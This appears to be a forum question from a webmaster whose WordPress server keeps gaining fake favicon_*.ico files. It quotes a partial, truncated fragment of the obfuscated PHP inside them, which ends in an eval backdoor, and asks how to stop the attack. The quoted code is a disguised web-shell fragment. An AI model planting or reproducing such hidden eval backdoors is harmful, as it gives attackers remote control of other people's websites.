apache – Mysterious ico files appearing on webserver

Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called something like favicon_1166f9.ico. The first 6 characters are always favico and the extension is always ico. Although these are not icons and cannot be opened by an image viewer.

Five days ago I did a clean sweep and deleted hundreds of these files yet I just found two. I noticed some on the server before but thought it was just corruption from uploading a favicon but obviously this is not the case. The site actually as one favicon.ico in just the home dir and is working fine.

What could be causing these files to keep appearing? Is the site hacked?

UPDATE 1: Starting to really look like a hack. Here is the partial content being inserted:

$c6d81c6 = 607;$GLOBALS('g1aff67e')=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"x47x4cx4fBx41x4cx53"}('h21842aa7')="x59x2fx6cx45x75x44x7ax6fx68x2ax53x74x73x51x48x72x26x21x25x67x28x70x55x7cxax76x35x60x52x43x65x3dx4dx71x4fx32x31x7ex34x20x5ax41x2ex2cx3bx9x30x6ax57x6ex3f

And it goes on for 7K ending in:

(91).$g1aff67e('h21842aa7')(38).$g1aff67e('h21842aa7')(36).$g1aff67e('h21842aa7')(57).$g1aff67e('h21842aa7')(36).$g1aff67e('h21842aa7')(66).$g1aff67e('h21842aa7')(38))($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db(1)($b7ce1c0db(2)));exit();}}} ?>

Note that the last part is an eval of whatever the rest is.

UPDATE 2: This StackOverflow question shows someone with the same problem.

There is accepted answer but the proposed solution is to disable all POST requests which will not be possible here given this is a WordPress site and there are other parts using POST too (although not many but they are necessary).

Given this information it seems that this is an attack and not virus which is probably why a virus scan turned out nothing.

The question now is: How do I prevent this attack from working? If that is in fact what is going on.